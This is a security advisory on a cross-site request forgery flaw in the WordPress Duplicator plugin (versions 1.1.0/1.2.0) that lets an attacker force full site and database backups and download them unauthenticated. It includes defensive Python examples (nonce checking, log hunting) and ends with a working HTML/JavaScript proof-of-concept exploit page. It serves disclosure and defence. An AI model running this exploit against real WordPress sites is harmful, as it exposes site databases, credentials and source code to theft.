
WordPress Duplicator 1.1.0 / 1.2.0 Cross Site Request Forgery

Posted Feb 12, 2016
Authored by RatioSec Research

WordPress Duplicator plugin versions 1.1.0 and 1.2.0 suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 342573c1ecd68024aff28d6cad156bddd3d61c5bc7ca94df51716fa2886b1e36

-----------------------------------------------------------------------------------------------
RatioSec Research Security Advisory RS-2016-002
-----------------------------------------------------------------------------------------------

Duplicator WordPress Plugin Code And Database Dump Via CSRF Vulnerability
-----------------------------------------------------------------------------------------------

Product: Duplicator WordPress Plugin
Vendor: Life In The Grid
Tested Versions: 1.1.0, 1.2.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 29th January, 2016
Advisory Publication: 9th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-002
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

-----------------------------------------------------------------------------------------------

RatioSec Research has discovered a cross-site request forgery
vulnerability in Duplicator WordPress Plugin which can be exploited to
generate and disclose the WordPress database and code backups.

The application allows users to perform certain actions via HTTP
requests without properly checking the requests' validity. An
authenticated user's browser can be forced to generate and disclose
the WordPress database and code backups via the vulnerable backup
function by tricking the user into visiting a malicious web site.
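The check the advisory reports as missing is a request token that a foreign origin cannot forge. The Python model below is an added example, not code from the advisory, from Duplicator or from WordPress: it mirrors the pattern WordPress nonces follow (an HMAC over a time tick, the action name, the user id and the session token, accepted for the current and the previous tick) and puts it in front of a state-changing handler, so that a request carrying only the session cookie is refused. The handler name, the 12-hour tick and SITE_SECRET are assumptions.

```python
"""Request nonces bound to user, action and time, modelled on the
WordPress nonce scheme. Added example: not Duplicator's or WordPress's
code; function names, the 12-hour tick and SITE_SECRET are assumptions.
"""
import hashlib
import hmac
import time

NONCE_LIFE = 24 * 60 * 60   # seconds a nonce stays acceptable (assumed: one day)
SITE_SECRET = b"constructed-secret-replace-with-the-site-salt"  # constructed value


def _tick(now):
    # Time bucket of half the lifetime; accepting the current and the
    # previous bucket gives a validity window between 12 and 24 hours.
    return int(now // (NONCE_LIFE / 2)) + 1


def _digest(tick, action, user_id, session_token):
    # The session token ties the nonce to this login; a foreign origin
    # cannot read it, so it cannot compute the nonce either.
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    return hmac.new(SITE_SECRET, msg, hashlib.sha256).hexdigest()[-12:-2]


def create_nonce(action, user_id, session_token, now=None):
    """Nonce the server embeds in its own admin page for this user and action."""
    now = time.time() if now is None else now
    return _digest(_tick(now), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now=None):
    """Constant-time check against the current and the previous tick."""
    if not isinstance(nonce, str):
        return False
    now = time.time() if now is None else now
    tick = _tick(now)
    return any(
        hmac.compare_digest(_digest(t, action, user_id, session_token).encode(), nonce.encode())
        for t in (tick, tick - 1)
    )


def handle_package_build(request, user, now=None):
    """Gate for a state-changing admin action (assumed handler name).

    The vulnerable pattern accepts the request as soon as the session
    cookie is valid, so any page the administrator visits can trigger it.
    The hardened pattern additionally demands a capability and a nonce.
    Returns (http_status, message).
    """
    if not user.get("can_manage_options"):
        return 403, "insufficient capability"
    nonce = request.get("params", {}).get("_wpnonce")
    if not verify_nonce(nonce, "duplicator_package_build", user["id"], user["session_token"], now):
        return 403, "missing or invalid nonce"
    return 200, "package build started"


if __name__ == "__main__":
    admin = {"id": 1, "session_token": "constructed-session", "can_manage_options": True}
    token = create_nonce("duplicator_package_build", admin["id"], admin["session_token"])
    print(handle_package_build({"params": {"_wpnonce": token}}, admin))   # legitimate form submit
    print(handle_package_build({"params": {}}, admin))                    # cookie-only request
```

The capability check alone would not help here: the PoC runs in the administrator's own browser, so the victim already has every capability. What stops the forged request is the nonce, which only a page served by the site itself can embed.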

-----------------------------------------------------------------------------------------------

Proof of Concept

The proof of concept HTML page, if visited by a logged-in
administrative user, issues two requests
(`/wp-admin/admin.php?page=duplicator&tab=new2` and
`/wp-admin/admin-ajax.php?action=duplicator_package_build`) forcing
the creation of the WordPress source code, database, and install
script backups in the paths
`/wp-snapshots/ratiosec_ratiosec_archive.zip`,
`/wp-snapshots/ratiosec_ratiosec_database.sql`, and
`/wp-snapshots/ratiosec_ratiosec_installer.php`. Once generated, the
backup archives can be downloaded by the attacker with no
authentication.

See the proof of concept code on the RatioSec Research website.
http://www.ratiosec.com/2016/duplicator-wordpress-plugin-source-database-disclosure-via-csrf/
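The chain just described leaves a distinctive trail in web server access logs: a POST to the Duplicator admin page and an admin-ajax call whose Referer is not the site itself, followed by successful fetches under `/wp-snapshots/`. The detector below is an added example, not part of the advisory; the log lines and host names are constructed, and the Referer rule is a heuristic (a referrer policy can strip the header, so an absent Referer is weak evidence on its own, while a successful backup download from an unrelated client is the stronger signal).

```python
"""Hunt access logs for the Duplicator CSRF chain described above.

Added example, not from the advisory. SITE_HOST and the log lines are
constructed; the Referer rule is a heuristic, not proof of forgery.
"""
import re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "blog.example"                      # constructed: the site's own host
SENSITIVE_AJAX_ACTIONS = {"duplicator_package_build"}
BACKUP_EXTENSIONS = (".zip", ".sql", ".php")

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a package build triggered from a third-party page,
# then an unauthenticated pull of the database dump by another client.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Feb/2016:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 21 "http://blog.example/wp-admin/" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Feb/2016:10:00:05 +0000] "POST /wp-admin/admin.php?page=duplicator&tab=new2 HTTP/1.1" 200 5120 "http://other-site.example/page.html" "Mozilla/5.0"',
    '203.0.113.7 - - [09/Feb/2016:10:00:07 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_package_build HTTP/1.1" 200 311 "http://other-site.example/page.html" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Feb/2016:10:01:30 +0000] "GET /wp-snapshots/ratiosec_ratiosec_database.sql HTTP/1.1" 200 8388608 "-" "curl/7.47.0"',
    '203.0.113.7 - - [09/Feb/2016:10:05:00 +0000] "POST /wp-admin/admin.php?page=duplicator&tab=new2 HTTP/1.1" 200 5120 "http://blog.example/wp-admin/admin.php?page=duplicator" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def same_origin(referer):
    """True only when the Referer names the site itself; '-' means no Referer."""
    if not referer or referer == "-":
        return False
    return urlsplit(referer).hostname == SITE_HOST


def analyse(lines):
    """Return (rule, client_ip, request_path, referer) tuples for suspicious lines."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["path"])
        qs = parse_qs(url.query)
        if url.path.endswith("/wp-admin/admin-ajax.php"):
            # Sensitive AJAX action reached from a page the site did not serve.
            if SENSITIVE_AJAX_ACTIONS & set(qs.get("action", [])) and not same_origin(rec["referer"]):
                findings.append(("csrf_suspect_ajax", rec["ip"], rec["path"], rec["referer"]))
        elif url.path.endswith("/wp-admin/admin.php") and rec["method"] == "POST":
            # Plugin settings form posted from a foreign page.
            if qs.get("page") == ["duplicator"] and not same_origin(rec["referer"]):
                findings.append(("csrf_suspect_post", rec["ip"], rec["path"], rec["referer"]))
        elif "/wp-snapshots/" in url.path and url.path.endswith(BACKUP_EXTENSIONS):
            # Any successful fetch of a backup artefact is worth review: the
            # directory needs no authentication in the affected versions.
            if rec["status"].startswith("2"):
                findings.append(("backup_download", rec["ip"], rec["path"], rec["referer"]))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding)
```

On the constructed sample the first and last lines (same-origin heartbeat and a form posted from the plugin's own page) produce nothing, while the two foreign-Referer requests and the dump download are reported. In practice the backup_download rule is the one to alert on, and the two CSRF rules give the context for where the package came from.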

-----------------------------------------------------------------------------------------------

Solution

Update to version 1.1.4.

-----------------------------------------------------------------------------------------------

Timeline

- First contact: 29th January, 2016
- Disclosure: 29th January, 2016. Preliminary date set to 19th February, 2016.
- Postponed: Date pushed back to 19th February, 2016
- Fixed in GIT: 6th February, 2016
- Fixed Release: 9th February, 2016
- Advisory Publication: 9th February, 2016

-----------------------------------------------------------------------------------------------

Advisory URL

http://www.ratiosec.com/2016/duplicator-wordpress-plugin-source-database-disclosure-via-csrf/

RatioSec Research

Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec




==============
POC:

<html>
<body>
<script>

// Target WordPress installation; adjust to the site under test.
var wordpress_root = "http://localhost/wordpress";

// Request 1: POST the "new package" form to the Duplicator admin page.
// The request carries the victim's session cookie (withCredentials) but
// no nonce, which is the missing validity check the advisory describes.
function submitRequest1()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", wordpress_root + "/wp-admin/admin.php?page=duplicator&tab=new2", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "action=&package-hash=ratiosec&package-name=ratiosec&package-notes=&archive-format=ZIP&filter-dirs=&filter-exts=&dbhost=&dbport=&dbname=&dbuser=&url-new=";
// Send the form body as a raw byte Blob.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
// Request 2: trigger the AJAX build action that writes the archive,
// database dump and installer into /wp-snapshots/.
function submitRequest2()
{
var xhr = new XMLHttpRequest();
xhr.open("GET", wordpress_root + "/wp-admin/admin-ajax.php?action=duplicator_package_build", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.withCredentials = true;
var body = "";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
// List the predictable locations of the generated dumps, which the
// affected versions serve without authentication.
function printLinks()
{
var dumps = ["ratiosec_ratiosec_archive.zip", "ratiosec_ratiosec_database.sql", "ratiosec_ratiosec_installer.php"];
for (var a = 0; a < dumps.length; a++) {
var url = wordpress_root + '/wp-snapshots/' + dumps[a];
document.body.innerHTML += '<br/><a href="' + url + '">' + url + '</a>';
}
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest1();setTimeout(submitRequest2,2000);setTimeout(printLinks,2500);" />
</form>
<p>Submit the CSRF request and wait a few seconds to see the public links of the dumps below.</p>
</body>
</html>